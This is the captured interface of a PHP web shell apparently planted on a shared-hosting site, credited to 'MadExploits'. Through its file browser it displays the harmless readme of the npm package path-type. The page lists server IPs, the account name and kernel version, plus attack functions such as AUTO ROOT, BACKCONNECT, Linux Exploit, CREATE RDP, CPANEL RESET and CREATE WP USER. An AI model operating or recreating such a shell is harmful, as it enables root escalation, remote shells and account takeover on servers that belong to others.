Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.17
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
public_html /
node_modules /
path-type /
[ HOME SHELL ]
Name
Size
Permission
Action
index.d.ts
1.27
KB
-rw-r--r--
index.js
1.15
KB
-rw-r--r--
license
1.08
KB
-rw-r--r--
package.json
714
B
-rw-r--r--
readme.md
1.09
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readme.md
# path-type [](https://travis-ci.org/sindresorhus/path-type) > Check if a path is a file, directory, or symlink ## Install ``` $ npm install path-type ``` ## Usage ```js const {isFile} = require('path-type'); (async () => { console.log(await isFile('package.json')); //=> true })(); ``` ## API ### isFile(path) Check whether the passed `path` is a file. Returns a `Promise<boolean>`. #### path Type: `string` The path to check. ### isDirectory(path) Check whether the passed `path` is a directory. Returns a `Promise<boolean>`. ### isSymlink(path) Check whether the passed `path` is a symlink. Returns a `Promise<boolean>`. ### isFileSync(path) Synchronously check whether the passed `path` is a file. Returns a `boolean`. ### isDirectorySync(path) Synchronously check whether the passed `path` is a directory. Returns a `boolean`. ### isSymlinkSync(path) Synchronously check whether the passed `path` is a symlink. Returns a `boolean`. ## License MIT © [Sindre Sorhus](https://sindresorhus.com)
Close